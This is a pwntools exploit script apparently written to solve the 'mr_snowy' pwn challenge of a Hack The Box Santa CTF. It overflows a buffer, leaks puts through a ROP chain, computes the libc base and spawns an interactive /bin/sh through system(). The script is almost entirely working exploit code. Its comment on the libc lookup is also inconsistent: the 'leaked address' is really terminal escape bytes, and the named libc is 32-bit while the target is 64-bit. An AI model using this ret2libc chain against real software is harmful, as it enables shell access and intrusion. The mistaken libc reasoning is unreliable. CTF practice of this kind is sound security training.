htb-santa-ctf/pwn/mrsnowy/kabuttmache.py

#!/bin/env python

from pwn import *

context.arch = 'amd64'
offset = 0x48

elf = ELF('./mr_snowy')
p = elf.process()

# navigate to the affected read()
def do_read():
  while True:
     ll = p.read()
     if b'>' in ll:
       break

rop = ROP(elf)
rop.call(elf.symbols['puts'], [elf.got['puts']])
rop.call(elf.symbols['investigate'])

# assemble payload
payload = [
    b'\xAA'*offset,
	rop.chain()
]

# skip menu
do_read()
p.sendline(b'1')
do_read()

# send payload
p.sendline(b''.join(payload))
puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00'))
log.info(f'puts found at {hex(puts)}')

# Note:
# libc database search for puts address: 0x6d31333b315b1b20
# -> libc6_2.19-18+deb8u10_i386
# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so

libc = ELF("libc6_2.19-18+deb8u10_i386.so")
libc.address = puts - libc.symbols["puts"]
log.info(f'libc base address determined {hex(libc.address)}')

rop = ROP(libc)
rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ])
rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ])
rop.call('exit')

# assemble payload
payload = [
    b'\xAA'*offset,
	rop.chain()
]

p.sendline(b''.join(payload))
p.interactive()